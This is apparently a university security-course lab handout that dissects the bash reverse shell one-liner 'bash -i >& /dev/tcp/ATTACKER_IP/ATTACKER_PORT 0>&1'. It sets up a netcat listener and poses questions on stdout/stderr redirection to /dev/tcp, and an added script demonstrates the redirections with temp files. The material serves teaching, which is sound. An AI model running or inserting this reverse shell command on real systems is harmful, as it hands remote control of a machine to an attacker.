LAB: That crazy bash command

In the reverse shell assignment, I asked you to set up a listener on your attacking machine (nc -l -p 5000 or something like that) and then cause the target machine to reach out to the attacker with a shell by executing a command like this:

bash -c "bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1"

We're going to go through this lab together in class to try to gradually make sense of the pieces of this command.

To get started:

Your Carleton user name, lower case:

What happens when you execute echo $0?

What happens when you execute python3 hello.py?

What happens when you execute python3 hello.py > test1.txt?

What happens when you execute python3 hello.py 2> test2.txt?

What happens when you execute python3 hello.py >& test3.txt? How about python3 hello.py &> test4.txt? (The distinction appears to be one of personal preference.)

What happens when you execute python3 hello.py 2> /dev/null?

On your host OS, launch a listener at port 5000 (or whatever). What happens when you go back to Kali and execute python3 hello.py 2> /dev/tcp/HOST_IP/5000?

Execute bash on Kali, and then echo $0.

Still using bash, what happens when you execute python3 hello.py 2> /dev/tcp/HOST_IP/5000? Try the other redirections too (>, >&).
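To see what each of the redirections above does without leaving the terminal, here is an added example that is not part of the lab handout: HELLO is a constructed stand-in for hello.py (one line on stdout, one on stderr), each redirection from the questions is applied to it inside an explicit bash, and the last function shows what the trailing 0>&1 does using a read/write file in place of the socket.

```sh
# Added example (not part of the lab handout): HELLO stands in for hello.py.
# It is a brace group so one redirection applies to both of its commands:
# one line on stdout (fd 1) and one on stderr (fd 2).
HELLO='{ echo out-line; echo err-line >&2; }'

# Every lab redirection is run by an explicit `bash -c`: >&, &> and
# /dev/tcp/... are bash features, not POSIX sh or zsh ones, which is why
# the lab has you check `echo $0` and start bash before the /dev/tcp step.

# in_file REDIR: what the file named to the right of REDIR receives.
in_file() {
    tmp=$(mktemp)
    bash -c "$HELLO $1 $tmp" >/dev/null 2>&1
    cat "$tmp"
    rm -f "$tmp"
}

# on_terminal REDIR: what still reaches your screen (fd 1 and fd 2 are
# merged here so the caller sees both), i.e. what you watch in the lab.
on_terminal() {
    tmp=$(mktemp)
    bash -c "$HELLO $1 $tmp" 2>&1
    rm -f "$tmp"
}

# fd_dup: the trailing 0>&1 piece. fd 1 is opened read/write on a file
# (standing in for the socket); 0>&1 makes fd 0 the same open file, so
# `read` consumes what was "sent in" and echo's reply lands in the same file.
fd_dup() {
    tmp=$(mktemp)
    printf 'from-the-socket\n' > "$tmp"
    bash -c 'read -r line 0>&1; echo "stdin got: $line"' 1<> "$tmp"
    cat "$tmp"
    rm -f "$tmp"
}

# Constructed demo run: one row per redirection the lab asks about.
for r in '>' '2>' '>&' '&>'; do
    printf '%-3s file:[%s] screen:[%s]\n' "$r" \
        "$(in_file "$r" | tr '\n' ' ')" "$(on_terminal "$r" | tr '\n' ' ')"
done
fd_dup
```

Swapping the file for /dev/tcp/HOST_IP/5000 changes only where the bytes go, not which descriptors are redirected.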